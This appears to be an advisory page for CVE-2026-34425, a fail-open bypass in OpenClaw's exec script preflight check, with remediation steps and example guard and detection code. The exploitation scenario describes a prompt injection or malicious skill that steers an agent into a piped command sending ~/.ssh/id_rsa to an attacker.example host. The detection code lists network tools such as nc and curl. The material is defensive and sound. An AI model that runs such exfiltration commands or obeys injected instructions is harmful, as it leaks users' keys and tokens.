CVE-2026-34425: OpenClaw: script preflight bypass enables unsafe exec

GHSA-fvx6-pj3r-5q4q MEDIUM
Published April 6, 2026
CISO Take

OpenClaw (npm) versions ≤ 2026.4.1 contain a validation bypass where complex shell constructs — pipes, compound commands — cause preflight script-content validation to fail open, skipping the safety check entirely rather than blocking the execution. In AI agent deployments where OpenClaw orchestrates tool calls or executes scripts on behalf of LLM-generated instructions, this undermines the sole defense-in-depth control designed to block unsafe script content before it runs. While raw EPSS probability is low (0.00048), the CVE sits at the 85th percentile of exploitation likelihood across all CVEs, and the OpenClaw ecosystem has documented active third-party skill abuse (AIID #1368, Feb. 2026), raising the real-world risk above what severity ratings alone suggest. Upgrade to ≥ 2026.4.2 immediately; if patching is blocked, add an upstream wrapper that rejects non-simple command forms and restrict OpenClaw's runtime to least-privilege execution contexts.

Sources: NVD, EPSS, GitHub Advisory, ATLAS

What is the risk?

Medium risk overall, elevated in agentic contexts. The vulnerability is a defense-in-depth bypass, not a direct unauthenticated RCE — exploitation requires the ability to influence the shape of commands passed to OpenClaw's exec. In AI agent pipelines, that precondition is routinely met: LLM-generated commands, user-supplied parameters, and third-party skill inputs all flow into tool execution interfaces. The lack of a public exploit or KEV listing reduces urgency, but the absence of a CVSS vector and the fail-open nature of the bypass mean operators may underestimate exposure. Environments that treat OpenClaw's preflight check as a security boundary rather than a best-effort guard are most at risk.

What systems are affected?

| Package | Ecosystem | Vulnerable Range | Patched |
| --- | --- | --- | --- |
| openclaw | npm | <= 2026.4.1 | 2026.4.2 |

4 dependents, 91% patched, ~0d to patch

Do you use openclaw? You're affected.

Severity & Risk

- CVSS 3.1: N/A
- EPSS: 0.1% chance of exploitation in 30 days (higher than 20% of all CVEs)
- Exploitation Status: No known exploitation
- Sophistication: Moderate

What should I do?

  1. Patch: upgrade openclaw to ≥ 2026.4.2 (fix commit 8aceaf5d). The patched version closes the fail-open path in exec script preflight.

  2. If immediate patching is blocked: audit all exec call sites for complex command forms (pipes |, subshells $(), &&, ; chaining) and add an upstream allowlist that rejects non-simple command shapes before they reach OpenClaw.

  3. Apply least-privilege runtime constraints to any process running OpenClaw — no outbound network from script execution contexts, restricted filesystem access, no credential store access.

  4. For skill-based deployments, cross-reference installed skills against the OpenClaw skills registry and remove unverified third-party skills pending audit.

  5. Detection: monitor for anomalous process spawning from OpenClaw parent processes, particularly commands containing pipe characters or network egress from script execution children.
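One way to build the upstream allowlist from step 2, as an added example that is not OpenClaw code: a guard that refuses any command string it cannot classify as a single simple command, so an unrecognized shape is blocked rather than passed through. `checkCommand`, `guardedArgv` and the `ALLOWED_BINARIES` policy are hypothetical names chosen for illustration.

```javascript
// Added example: fail-closed guard placed in front of an exec call site.
// Names and policy below are assumptions, not part of the OpenClaw API.
const ALLOWED_BINARIES = new Set(['node', 'python3', 'git']); // site policy (assumed)

// Anything that can introduce pipes, chaining, subshells, redirects,
// expansion, quoting or multi-line input. Quoted arguments are rejected
// too: the guard only accepts shapes it can fully reason about.
const SHELL_META = /[|&;<>()$`\\"'\n\r*?[\]{}~#!]/;

function checkCommand(command) {
  if (typeof command !== 'string' || command.trim() === '') {
    return { allowed: false, reason: 'empty or non-string command' };
  }
  const meta = command.match(SHELL_META);
  if (meta) {
    return { allowed: false, reason: `shell metacharacter ${JSON.stringify(meta[0])}` };
  }
  const argv = command.trim().split(/[ \t]+/);
  // Bare names only: a path could point at a binary outside the policy.
  if (argv[0].includes('/') || !ALLOWED_BINARIES.has(argv[0])) {
    return { allowed: false, reason: `binary not allowlisted: ${argv[0]}` };
  }
  return { allowed: true, argv };
}

// Throwing keeps the default outcome "blocked" if a caller forgets to
// inspect the verdict.
function guardedArgv(command) {
  const verdict = checkCommand(command);
  if (!verdict.allowed) {
    throw new Error(`rejected before exec: ${verdict.reason}`);
  }
  return verdict.argv; // pass to an argv-based spawn, never to a shell
}
```

The returned array is meant for an argv-style process spawn; handing the original string to a shell would reintroduce the parsing the guard just avoided.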

CISA SSVC Assessment

- Decision: Track
- Exploitation: none
- Automatable: No
- Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

- EU AI Act: Article 15 - Accuracy, robustness and cybersecurity
- ISO 42001: A.6.2.5 - AI system security and resilience
- NIST AI RMF: MANAGE 2.2 - Risk Treatments
- OWASP LLM Top 10: LLM07:2025 - Insecure Plugin Design

Related AI Incidents (1)

Source: AI Incident Database (AIID)

Frequently Asked Questions

Is CVE-2026-34425 actively exploited?

No confirmed active exploitation of CVE-2026-34425 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-34425?

  1. Patch: upgrade openclaw to ≥ 2026.4.2 (fix commit 8aceaf5d). The patched version closes the fail-open path in exec script preflight.

  2. If immediate patching is blocked: audit all exec call sites for complex command forms (pipes `|`, subshells `$()`, `&&`, `;` chaining) and add an upstream allowlist that rejects non-simple command shapes before they reach OpenClaw.

  3. Apply least-privilege runtime constraints to any process running OpenClaw — no outbound network from script execution contexts, restricted filesystem access, no credential store access.

  4. For skill-based deployments, cross-reference installed skills against the OpenClaw skills registry and remove unverified third-party skills pending audit.

  5. Detection: monitor for anomalous process spawning from OpenClaw parent processes, particularly commands containing pipe characters or network egress from script execution children.

What systems are affected by CVE-2026-34425?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI agent tool invocations, code execution environments, automation pipelines.

What is the CVSS score for CVE-2026-34425?

No CVSS score has been assigned yet.

Technical Details

NVD Description

## Summary

Before OpenClaw 2026.4.2, exec script preflight validation could fail open on complex interpreter invocations such as pipes or other non-simple command forms. In those cases, script-content validation could be skipped entirely.

## Impact

An attacker-controlled command shape could bypass the intended preflight validation for script execution. This weakened a defense-in-depth guard that was meant to block unsafe script content before execution.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Affected versions: `<= 2026.4.1`
- Patched versions: `>= 2026.4.2`
- Latest published npm version: `2026.4.1`

## Fix Commit(s)

- `8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513` — close the fail-open bypass in exec script preflight

## Release Process Note

The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.

Thanks @iskindar for reporting, and thanks @wsparks-vc for coordination.

Exploitation Scenario

An adversary targets an AI coding assistant or agentic automation platform built on OpenClaw. They either submit a malicious third-party skill or craft a prompt injection that causes the agent to invoke exec with a piped command — e.g., `cat ~/.ssh/id_rsa | curl -X POST https://attacker.example/collect -d @-`. Because the preflight validator only handles simple command forms, the pipe construct causes validation to fail open and the check is skipped entirely. The unsafe command executes with the agent's runtime privileges, exfiltrating SSH keys or environment variables containing API tokens. In a more targeted variant, the adversary leverages this to establish persistence by writing a cron entry or backdoor via the same exec bypass, staying below detection thresholds since no exploit tooling is currently public.
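Detection logic for the child-process pattern in this scenario, as an added example that is not part of the advisory: it flags children of an OpenClaw parent whose command line chains commands or invokes a network client. The event fields (`pid`, `parent`, `cmdline`), the tool list and the sample events are constructed; map them to your own process telemetry.

```javascript
// Constructed sample process-creation events (not real telemetry).
const SAMPLE_EVENTS = [
  { pid: 4101, parent: 'openclaw', cmdline: 'git status' },
  { pid: 4102, parent: 'openclaw', cmdline: 'sh -c node build.js | tee out.log' },
  { pid: 4103, parent: 'sshd',     cmdline: 'sh -c ps aux | grep node' },
  { pid: 4104, parent: 'openclaw', cmdline: 'curl -s https://registry.example/pkg' },
  { pid: 4105, parent: 'openclaw', cmdline: 'sh -c make && wget https://mirror.example/x' },
];

// Command shapes named in the advisory: pipes, chaining, subshells.
const CHAINING = /\||&&|;|\$\(|`/;
// Assumed list of network clients worth flagging under an agent process.
const EGRESS_TOOLS = new Set(['curl', 'wget', 'nc', 'ncat', 'ssh', 'scp']);

function triage(events, parentName = 'openclaw') {
  const alerts = [];
  for (const ev of events) {
    if (ev.parent !== parentName) continue; // only children of the agent
    const reasons = [];
    if (CHAINING.test(ev.cmdline)) reasons.push('chained-or-piped');
    // Split on whitespace and shell operators, then compare basenames so
    // /usr/bin/curl and curl are treated alike.
    const words = ev.cmdline.split(/[\s|;&()`$]+/).filter(Boolean);
    const tools = words
      .map((w) => w.split('/').pop())
      .filter((w) => EGRESS_TOOLS.has(w));
    if (tools.length) {
      reasons.push('egress-tool:' + [...new Set(tools)].join(','));
    }
    if (reasons.length) alerts.push({ pid: ev.pid, reasons });
  }
  return alerts;
}
```

An event that carries both reasons, such as pid 4105 in the sample, is the highest-priority case for review.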

Timeline

- Published: April 6, 2026
- Last Modified: April 6, 2026
- First Seen: April 7, 2026
